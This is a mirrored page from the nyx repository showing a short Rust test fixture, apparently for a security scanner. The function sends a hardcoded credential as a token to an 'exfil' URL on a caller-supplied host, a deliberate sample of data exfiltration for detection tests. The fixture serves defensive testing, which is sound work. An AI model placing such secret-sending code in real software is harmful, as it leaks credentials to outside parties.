mirror of
https://github.com/elicpeter/nyx.git
synced 2026-06-12 19:55:14 +02:00
6 lines
220 B
Rust
6 lines
220 B
Rust
// Phase 11 (Track J.9) — Rust DATA_EXFIL vuln fixture.
|
|
pub fn run(host: &str) {
|
|
let secret = "alice-creds";
|
|
let url = format!("http://{host}/exfil?token={secret}");
|
|
let _ = reqwest::blocking::get(&url);
|
|
}
|